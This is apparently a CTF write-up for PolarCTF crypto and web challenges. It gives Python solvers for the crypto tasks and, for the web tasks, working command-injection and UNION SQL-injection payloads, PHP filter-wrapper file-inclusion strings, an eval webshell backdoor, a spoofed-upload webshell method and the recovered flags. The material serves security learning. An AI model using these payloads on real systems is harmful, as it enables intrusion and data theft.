polarctf-wp

CRYPTO

beginner

from Crypto.Util.number import long_to_bytes

# 给定的结尾数值
suffix = 16732186163543403522711798960598469149029861032300263763941636254755451456334507142958574415880945599253440468447483752611840

# 验证suffix是否是2^125的倍数
bits_125 = 1 << 125
if suffix % bits_125 != 0:
    raise ValueError("Suffix is not divisible by 2^125, no solution exists.")

# 计算S' = suffix / 2^125
s_prime = suffix // bits_125

# 计算模数5^125
mod_5_125 = 5 ** 125

# 计算2^9875在模5^125下的逆元
inv_2_9875 = pow(2, -9875, mod_5_125)

# 求解m ≡ s_prime * inv_2_9875 mod 5^125
m = (s_prime * inv_2_9875) % mod_5_125

# 将整数转换为字节并解码为UTF-8字符串
flag_bytes = long_to_bytes(m)
flag = flag_bytes.decode('utf-8', errors='ignore').rstrip('\x00')  # 去除可能的填充空字符

print("解密后的Flag:", flag)

flag{qwert_yuioplk_jhgfdsa_zxcv_bnm}

Ununicast

import gmpy2
from sympy.ntheory.modular import crt

# 输入n和c的值，这里需要替换为实际的输出值
n = [22103870455568232891149694305142888751834308614394265111616851946569600408214771004642537180847811632101335684526571461971168013515137837024900824805617026937904594229522094231161022911739124543737188196687483192656237801622618078066399259928261566545087643719410735482610730976575506701177108423445928193645406926842010985319473171710362525271971508507747952666476652082985675013329629912123828667561346609223913700779782291638584038925201698832368301491167548373412290987271213331940429281040520028261848410995501268272516219976073764836056701179000719299634048587399330114683369803481960168019956231748933059575086,75527641277099990800438920440041058388427571492243099817050670120985557789492014161535482889418153237600686779752008243731659250445079816272020155052679163716181164111466120389153470493389801068487079484957125572093805976995390398541806299511780722297642464948545911633969882049338027366168822259177038560221615245305724815740962661657512543487558774545803259821939839314547049519064559274668861232108875651136746020639698802437427698294031084596199751751480045337605111284980409927684686225365555725770862339970487179511801140925931587981761559129421142486178642732741442537609122284807214875446647952010067400441059,67087501562139943813249584173215038264768218519355997619681399311361081244680048116472803745503996059873261361695629103578075388683394265112338602330356608572716276538183020643625652731722917269342461918246200053767885270359910155650804090015847462552469649420213346519159991670579334968778366255234963922378971680452094795318028353408405313888877068259282684640458674087251102468714734787171166396014144021959441774122328495595094512659302451021226956296868717965902597097040721193168373568780684532295504916946312087113872338693404258549907349353138009767393388073227204853717415106619739522003848121147803734511476, 107655225342909323493747650996643964780949305458547565103531987767712606044684527447631280423897684091717655597473336978923442425477823322239803312759244627308704521511743542550831030718035257133033470431042111429555597381959609892666206716219532081847930970282959800999825630713834546858387640307817593411764905032303294057112362597297253851687870254992314351948709124427458348128204263663881362955482132512838054738519685384575921373737470245719421223898475756247409282692966862335515090757754459242168056461013405091180148696649963461602177212697836496306046456138474445624214914814699390257673835554848791003397055, 70199621485671842359044641866403168058670803503736686351887502686934276983786039926002198676793045683182125769300687612734657616494815167750772182403321230734527784596550124329071164871143795929191396166096178482901122962656943854107741654772981259089537233024363295465966490361367216383217631330482253245796203648485653095242684462412133029510769320566443165990471527944889669809129572843754832577807509454633886982402256837076791468127186325307925886447397529190962280905611709973103713165872442266384750885343667064502988575278416037070011939869923447549518023420261237007329747290577829325263253564790709373901618]  # 替换为实际的n值列表
c = [11932229075145446680509155897048554062128427256365407597246250504495581359308426337230014475362231568192824606320775755785288148002607456528824047021370456983795336102290050703706457189838464034831160081682076095173411617546158489572376376884672473947738113750437924641752734999601688973523833305072494573210602790160977994408649942476416234572187935125916149727341802693373659080702112924850348826357976589797895053949499171267826718541148026541242636886850084012913015158312606367900952240929619627369492395483334316329627526281924799100659188037308919177852074431004118744919974806767580700568542188744931220106105, 124027357006179169026958610630330051622067042499828335143384044470302479154098199844981110929954078399392164965842575040140695741764719533745054315027041147434320473103634538090232615962998187567447484128103678001361703834076345621055674269048895730502155866761233018172058631071676397257894588728272913258599692996320058955017804506826897453939809574483310935927402899939042162496213745140970798253433830063777555869660983592646174581212241911650074643983280676238861065129884340834318081282521338654119292893592735294429956139729060770783817702837759047833794757601190967753969500822631312988106678317432186105038268, 34907142326483502918854711671956997110565154361385230791804714287500927140885225814711150443792832759398271249995064551044140838772959358268339105708186456545576271462167016667528764892342067422814982959975071847067493078241698635502292984200940132917130864956317815578073656622172241742542237740221147402449228459532782232518010610903660510875077798419046748683570340175197592449547071220020985311569095928938768945219762563190314531483012532595972282105394784611117089120803198848347397871670119847470687912177591609360741114570213377874848453859418234331921560384819899391157666714587396643397702710016410117040255,260074379614284795599484546451240257157763532480505168853160303924952553177325935242853666448209970957052626857104522597130316456316378917529016900063473199051496246209878864043477905068893003923546332891289993179385753129868269775271722630762054161951558359984426822705582509592976962739279251035941138103001411061238095611738024433238447078804016593599525582868080696498271912174235479368671466666819582104245707176341268617126063957318342864903403961673418935623112290599738566078566393961145470677825235949530460449737989243772214379341818676279908757907698136648847166264635580606733816599243489965651372128251328,207467685064436795719671032825183115862587233648672449925340580227825675452627031507906214773278665727530027025673966750973641715014217092820995216768554881760711270444952703291126925400881160114713107315867759288572987159233984669439942981888636828978580980986834342715153361271280814208437227309185682033733871844684874967978852089340054449142896831217885786745795842561143568848428620959961049292832772489885193639646881909425599177539209159664137785111991625129191354004990699226809474030005545318219197509201907072684957499981194498761673049651408375607248956494019809957851295451628144493493011699904221882421955
]  # 替换为实际的c值列表

moduli = []
remainders = []

for index in range(5):
    k = index + 1
    current_n = n[index]
    current_c = c[index]
    
    # 计算模逆元
    inv_k = gmpy2.invert(k, current_n)
    # 计算d_i = c_i * inv_k mod n_i
    d_i = (current_c * inv_k) % current_n
    
    moduli.append(current_n)
    remainders.append(d_i)

# 使用中国剩余定理求解m^e
D, N = crt(moduli, remainders)
print("Recovered m^e:", D)
print("Modulus N:", N)

# 遍历可能的e值进行暴力破解
possible_e = [11, 13, 17, 19, 23, 29]
for e in possible_e:
    m, is_perfect = gmpy2.iroot(D, e)
    if is_perfect:
        flag = int(m).to_bytes((m.bit_length() + 7) // 8, 'big').decode('utf-8', errors='ignore').strip('\x00')
        print(f"Success with e={e}: {flag}")
        break
else:
    print("Failed to find a suitable e value.")

flag{7253348a0594e05548517f1d98eaf790}

LCG

from Crypto.Util.number import long_to_bytes

# 给定的参数
a = 156506070439514915241840745761803504236863873655854161309517219593159285490218416513868431750791509039364033002042672969954633160268127141912185884526880436614313300761314810148356686577662643452299620703125833160716418003026915719584690230453993382155777985020586206612864299316237848416232290650753975103343
b = 99238154412252510462155206432285862925162164007834452250464130686978914370223020006347851539449419633688760095534852514797292083351953228730558335170313299274579966373474363445106224340638196799329142279344558612634392675992734275683700752827665429269516389277374408716314038483357418130704741371183923688601
n = 94993804003827679355988952056520996247311128806455111011781585397953533782675757682874584547665028872979112598462143541626190903596606261782592703863749024490737374603789002750194481545579020929239629410573307193150780522563772690101754723829224534622557370960012364614566294197235191962517037441643656951249
c = 46154227430594568448486764587707836676441274677362557668215680998009402508945237578201692757688901737765923819819981974561807236454825684824157481322486008937560337004555948283870920377643907746645702190355761172293685309340938249454686807948964629553755585562990983237480387614548526918576791297250747752579

# 计算模逆元
ani = pow(a, -1, n)

# 初始化 seed
seed = c

# 循环解密
for i in range(10):
    seed = (ani * (seed - b)) % n

# 将最终结果转换为字节
result = long_to_bytes(seed)
print("解密后的结果:", result)

flag{lcglcglcglcglcglcglcglcg}

knock knock

根据提示在网上找到可能根据Polybius棋盘密码，并且行列互换

注意这里要自己改为大写THIS IS YOUR CHAMPION，加密后flag为flag{ac4826f8687d1108915e2118e54e0984}

WEB

coke的登陆

在提示页面注意到提示cookie，查看cookie值为coke-lishuai，并且注释给出账号是coke

在登录时直接用username=coke，password=coke-lishuai登录

获得flag{ji_xing_duizhang}

bllbl_rce

随便输几个命令均回显no，扫目录发现/admin/admin.php下有东西，访问可下载备份文件，源码如下

<?php
if (isset($_POST['command'])) {
    $command = $_POST['command'];
    if (strpos($command, 'bllbl') === false) {
        die("no");
    }
    echo "<pre>";
    system ($command);
    echo "</pre>";
}
?>

所以可用；隔开执行命令

command=ls;bllbl    //无flag文件
command=ls /;bllbl    //看到flag目录
command=tac /flag;bllbl   //flag{86bef3c8c8dacf54b1726ccd2fb6a7d7}

再给我30元

先看注释发现提示注入点为id，随便输一个id=1回显

下面开始注入

id=2-1   //为1的回显，说明为数字型
id=-1 or 1=1#  //成功回显
id=1 order by 2#   //正常回显
id=1 order by 3#   //错误回显
id=-1 union select 1,2#  //均回显
id=-1 union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())#   //回显 WelcomeSQL,user_info
id=-1 union select database(),(select group_concat(column_name) from information_schema.columns where table_name='user_info')#     //回显id,username,secret
id=-1 union select database(),(select group_concat(secret) from user_info)#   //回显flag

flag{0h_no_I_w@nt_too_many_￥30!!!}

狗黑子CTF变强之路

随便点点发现有个?page=的参数，尝试文件包含？

page=data://text/plain,<?php system("ls");?>  //回显只允许包含php文件，那就是文件包含了
page=php://filter/read=convert.base64-encode/resource=index.php  //读源码，解密后源码如下

<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    // 简单的文件类型检查，只允许包含 php 文件
    if (strpos($page, '.php')!== false) {
        include($page);
    } else {
        echo "只允许包含 php 文件";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>狗黑子的小破站</title>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
        }
    .button {
            display: inline - block;
            padding: 10px 20px;
            margin: 10px;
            background-color: #4CAF50;
            color: white;
            text-decoration: none;
            border-radius: 5px;
        }
    .button:hover {
            background-color: #45a049;
        }
        #content {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
    </style>
</head>
<body>
    <h1>欢迎来到 CTF 变强之路</h1>
    <div id="content">
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="miji.php">
            <input type="submit" value="秘籍" class="button">
        </form>
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="fabao.php">
            <input type="submit" value="法宝" class="button">
        </form>
        <form action="index.php" method="get">
            <input type="hidden" name="page" value="jinshouzhi.php">
            <input type="submit" value="金手指" class="button">
        </form>
    </div>
    <?php
    if (isset($_GET['page'])) {
        echo '<div id="display">';
    }
 ?>
</body>
</html>
<?php @eval($_POST['cmd'])?>

看到最后一排直接蚁剑连就行，在根目录下找到flag

flag{698d51a19d8a121ce581499d7b701668}

椰子树晕淡水鱼

提示文件包含，仿照上题试一试读源码，注意不用加后缀

page=php://filter/read=convert.base64-encode/resource=index

源码如下

//index.php
<?php
$page = isset($_GET['page']) ? $_GET['page'] : 'home';

if ($page == 'home') {
    include('home.php');
} else {
    include($page . '.php');
}
?>

//admin.php
<?php
    $correct_username = "zhsh";
    $correct_password = "zhsh920"; // 假设密码是 zhsh920

    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $username = $_POST['username'];
        $passwd = $_POST['password'];

        // 验证用户名和密码是否正确
        if ($username === $correct_username && $passwd === $correct_password) {
            echo '<script type="text/javascript">';
            echo 'window.location.href="index.php?page=givemeaimage";';
            echo '</script>';
            exit;
        } else {
            echo "<p class='error-message'>用户名或密码错误</p>";
        }
    }
?>

//givemeaimage.php
<?php
    // 文件上传处理逻辑
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // 允许的 Content-Type 类型
        $allowed_content_types = ['image/jpeg', 'image/png', 'image/gif'];

        // 获取文件的 Content-Type
        $file = $_FILES['file'];
        $content_type = $_FILES['file']['type']; // 获取文件的 Content-Type

        // 检查文件的 Content-Type 是否在允许的范围内
        if (in_array($content_type, $allowed_content_types)) {
            // 不检查文件的后缀名，直接使用上传的文件名
            $upload_path = 'uploads/' . basename($file['name']);
            if (move_uploaded_file($file['tmp_name'], $upload_path)) {
                echo "<p class='success-message'>文件上传成功: " . htmlspecialchars($upload_path) . "</p>";
            } else {
                echo "<p class='error-message'>文件上传失败，请重试。</p>";
            }
        } else {
            echo "<p class='error-message'>只允许上传图片文件 (JPEG, PNG, GIF)。</p>";
        }
    }
    ?>

因此直接上传马，抓包修改为image/jpeg，即可上传成功

蚁剑连接即可

flag{0aa3870e09b1e0210d050891a274ecb9}

复读机RCE

扫目录发现flag.txt，直接访问得到

flag{12400320-EBCD-D827-09A8-B0D909863DB7}

小白说收集很重要

先扫下目录

访问/users.json，感觉是用户名和密码

{
  "users": {
    "1001": "123456",
    "1002": "123456",
    "1003": "123456",
    "1004": "123456",
    "1005": "123456",
    "1006": "123456",
    "1007": "123456",
    "1008": "123456",
    "1009": "123456",
    "1010": "123456",
    "1011": "123456",
    "1012": "123456",
    "1013": "123456",
    "1014": "123456",
    "user01": "654321",
    "user02": "654321",
    "user03": "654321",
    "user04": "654321",
    "user05": "654321",
    "user06": "654321",
    "user07": "654321",
    "user08": "654321",
    "user09": "654321",
    "user10": "654321",
    "admin01": "admin",
    "admin": "admin123456",
    "admin02": "admin123"
  }
}

尝试admin/admin123456登录成功，然后看到url中是user_dashboard.php，猜测把user改为admin，尝试后果然直接进了管理员界面，然后命令执行就行

flag{150a4295992ba0d4c537ae945699a8c2}

来个弹窗

直接传个alert(1)，就显示攻击成功，然后就二次元？

识图可得是白金之星，MD5加密即可，flag{dbd65172f0a14c279bc461cd0185c70a}

0e事件

经过题目猜测就跟MD5有关，随便传入一个MD5之后为0e开头的，比如QNKCDZO

flag{adc394229ba455abbe56e057f20f883e}